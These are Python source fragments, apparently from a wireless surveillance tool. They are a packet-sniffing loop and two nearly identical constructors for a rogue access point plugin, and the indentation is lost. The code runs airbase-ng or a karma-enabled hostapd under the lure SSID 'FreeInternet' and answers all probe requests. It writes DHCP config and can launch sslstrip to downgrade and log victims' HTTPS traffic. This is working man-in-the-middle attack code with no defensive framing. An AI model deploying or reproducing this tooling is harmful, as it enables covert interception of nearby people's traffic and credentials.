def run(self):
if self.pcap:
self.parse_pcap()
else:
shownMessage = False
while not self.STOP_SNIFFING:
if self.enable_monitor_mode:
self.iface=mm.enable_monitor_mode(self.iface)
if not self.iface:
if not shownMessage:
logging.error("No suitable monitor interface available. Will check every 5 seconds, but not display this message again.")
shownMessage = True
time.sleep(5)
if not self.iface and self.enable_monitor_mode:
continue
if not self.iface:
logging.info("No interface specified. Will sniff *all* interfaces.")
else:
logging.info("Starting sniffing on interface '%s'"%self.iface)
try:
self.ready_status = True
shownMessage = False
sniff(store=0, iface=self.iface, prn=self.packeteer, filter=self.bfilter,
stopperTimeout=1, stopper=self.stopperCheck)
except Exception, e:
logging.error(("Scapy exception whilst sniffing. "
"Will back off for 5 seconds, "
"and try restart '%s' plugin") % __name__)
logging.error(e)
self.sniffErrors+=1
if self.sniffErrors >3 :
logging.error("Restarting module '%s' after 5 failed attempts" %__file__)
time.sleep(5)
def __init__(self, **kwargs):
self.ssid = kwargs.get("ssid", "FreeInternet")
self.wlan_iface = kwargs.get("wlan_iface", "wlan0mon") # If none, will use first wlan capable of injection
self.net_iface = kwargs.get("net_iface", "eth0") # iface with outbound internet access
self.enable_mon = kwargs.get("enable_mon", False) # airmon-ng start <wlan_iface>
self.promisc = kwargs.get("promisc", False) # Answer all probe requests
self.do_sslstrip = kwargs.get("sslstrip", False)
self.rogueif = kwargs.get("rogueif", "wlan5") # Answer all probe requests
self.hostapd = kwargs.get("hostapd", False) # Use hostapd instead of airbase-ng
self.hapdconf = kwargs.get("hapdconf", "/etc/hostapd.conf") # Config file to use for hostapd
self.hapdcmd = kwargs.get("hapdcmd", "/root/hostapd/2.1-karmaian/hostapd/hostapd") # Binary to use for hostapd
self.procs = {} #Var to hold external processes, and ensure they keep running
self.num_procs = 2 # How many procs should be run
self.verb = kwargs.get('verbose', 0)
self.already_seen={}
self.new_leases = deque()
self.ssl_strip_data = deque()
if self.do_sslstrip == "True":
self.do_sslstrip = True
#self.num_procs += 1
else:
self.do_sslstrip = False
if self.promisc == "True":
self.promisc = True
else:
self.promisc = False
if self.enable_mon == "True":
self.enable_mon = True
else:
self.enable_mon = False
if self.hostapd == "True":
self.hostapd = True
else:
self.hostapd = False
if self.enable_mon:
self.wlan_iface=mm.enable_monitor_mode(self.wlan_iface)
if not self.wlan_iface:
logging.error("No wlan_iface specified for rogueAP :(")
if not self.hostapd:
sys.exit(-1)
if self.hostapd:
airb_opts = [self.hapdconf]
self.airb_cmd = [self.hapdcmd] + airb_opts
self.rogueif = self.wlan_iface
else:
self.rogueif = "at0"
if self.promisc:
airb_opts = ['-e', self.ssid, '-P', self.wlan_iface]
else:
airb_opts = ['-e', self.ssid, self.wlan_iface]
self.airb_cmd = ['airbase-ng'] + airb_opts
self.airb_cmd = " ".join(self.airb_cmd)
self.set_ip_cmd = "ifconfig "+self.rogueif+" up 10.0.0.1 netmask 255.255.255.0"
hapd_config_file ="""
interface="""+self.rogueif+"""
bssid=00:11:22:33:44:00
driver=nl80211
ssid="""+self.ssid+"""
channel=6
disassoc_low_ack=0
auth_algs=3
ignore_broadcast_ssid=0
logger_syslog=-1
logger_stdout=-1
logger_syslog_level=1
logger_stdout_level=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
macaddr_acl=0
enable_karma=1
"""
f=open('/etc/hostapd.conf', 'w')
f.write(hapd_config_file)
f.close()
# Vars for DHCP server
config_file ="""
dhcp-range=10.0.0.2,10.0.0.100,255.255.255.0,8765h
dhcp-option=3,10.0.0.1
dhcp-option=6,8.8.8.8
dhcp-leasefile=/etc/dhcpd.leases
"""
f=open('/etc/dnsmasq.conf', 'w')
f.write(config_file)
f.close()
self.launch_dhcp = "dnsmasq -d -a 10.0.0.1 -i "+self.rogueif+" -C /etc/dnsmasq.conf"
# Monitor dhcpd.lease file for updates
with file("/etc/dhcpd.leases", 'a'):
os.utime("/etc/dhcpd.leases", None)
# Monitor dhcpd.lease file for updates
with file("/tmp/sslstrip.log", 'a'):
os.utime("/tmp/sslstrip.log", None)
wm = pyinotify.WatchManager() # Watch Manager
wdd = wm.add_watch(['/etc/dhcpd.leases', '/tmp/sslstrip.log'], pyinotify.IN_MODIFY, rec=True)
handler = EventHandler()
handler.someInstance = self
self.notifier = pyinotify.ThreadedNotifier(wm, handler)
self.notifier.start()
# SSL Strip
self.launch_sslstrip = "sslstrip_snoopy -w /tmp/sslstrip.log -f"
self.fo_ssl = open("/tmp/sslstrip.log", "r")
if self.do_sslstrip:
self.run_sslstrip()
def __init__(self, **kwargs):
self.ssid = kwargs.get("ssid", "FreeInternet")
self.wlan_iface = kwargs.get("wlan_iface", "mon0") # If none, will use first wlan capable of injection
self.net_iface = kwargs.get("net_iface", "eth0") # iface with outbound internet access
self.enable_mon = kwargs.get("enable_mon", False) # airmon-ng start <wlan_iface>
self.promisc = kwargs.get("promisc", False) # Answer all probe requests
self.do_sslstrip = kwargs.get("sslstrip", False)
self.rogueif = kwargs.get("rogueif", "wlan5") # Answer all probe requests
self.hostapd = kwargs.get("hostapd", False) # Use hostapd instead of airbase-ng
self.hapdconf = kwargs.get("hapdconf", "/etc/hostapd.conf") # Config file to use for hostapd
self.hapdcmd = kwargs.get("hapdcmd", "/root/hostapd/2.1-karmaian/hostapd/hostapd") # Binary to use for hostapd
self.procs = {} #Var to hold external processes, and ensure they keep running
self.num_procs = 2 # How many procs should be run
self.verb = kwargs.get('verbose', 0)
self.already_seen={}
self.new_leases = deque()
self.ssl_strip_data = deque()
if self.do_sslstrip == "True":
self.do_sslstrip = True
#self.num_procs += 1
else:
self.do_sslstrip = False
if self.promisc == "True":
self.promisc = True
else:
self.promisc = False
if self.enable_mon == "True":
self.enable_mon = True
else:
self.enable_mon = False
if self.hostapd == "True":
self.hostapd = True
else:
self.hostapd = False
if self.enable_mon:
self.wlan_iface=mm.enable_monitor_mode(self.wlan_iface)
if not self.wlan_iface:
logging.error("No wlan_iface specified for rogueAP :(")
if not self.hostapd:
sys.exit(-1)
if self.hostapd:
airb_opts = [self.hapdconf]
self.airb_cmd = [self.hapdcmd] + airb_opts
self.rogueif = self.wlan_iface
else:
self.rogueif = "at0"
if self.promisc:
airb_opts = ['-e', self.ssid, '-P', self.wlan_iface]
else:
airb_opts = ['-e', self.ssid, self.wlan_iface]
self.airb_cmd = ['airbase-ng'] + airb_opts
self.airb_cmd = " ".join(self.airb_cmd)
self.set_ip_cmd = "ifconfig "+self.rogueif+" up 10.0.0.1 netmask 255.255.255.0"
hapd_config_file ="""
interface="""+self.rogueif+"""
bssid=00:11:22:33:44:00
driver=nl80211
ssid="""+self.ssid+"""
channel=6
disassoc_low_ack=0
auth_algs=3
ignore_broadcast_ssid=0
logger_syslog=-1
logger_stdout=-1
logger_syslog_level=1
logger_stdout_level=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
macaddr_acl=0
enable_karma=1
"""
f=open('/etc/hostapd.conf', 'w')
f.write(hapd_config_file)
f.close()
# Vars for DHCP server
config_file ="""
dhcp-range=10.0.0.2,10.0.0.100,255.255.255.0,8765h
dhcp-option=3,10.0.0.1
dhcp-option=6,8.8.8.8
dhcp-leasefile=/etc/dhcpd.leases
"""
f=open('/etc/dnsmasq.conf', 'w')
f.write(config_file)
f.close()
self.launch_dhcp = "dnsmasq -d -a 10.0.0.1 -i "+self.rogueif+" -C /etc/dnsmasq.conf"
# Monitor dhcpd.lease file for updates
with file("/etc/dhcpd.leases", 'a'):
os.utime("/etc/dhcpd.leases", None)
# Monitor dhcpd.lease file for updates
with file("/tmp/sslstrip.log", 'a'):
os.utime("/tmp/sslstrip.log", None)
wm = pyinotify.WatchManager() # Watch Manager
wdd = wm.add_watch(['/etc/dhcpd.leases', '/tmp/sslstrip.log'], pyinotify.IN_MODIFY, rec=True)
handler = EventHandler()
handler.someInstance = self
self.notifier = pyinotify.ThreadedNotifier(wm, handler)
self.notifier.start()
# SSL Strip
self.launch_sslstrip = "sslstrip_snoopy -w /tmp/sslstrip.log -f"
self.fo_ssl = open("/tmp/sslstrip.log", "r")
if self.do_sslstrip:
self.run_sslstrip()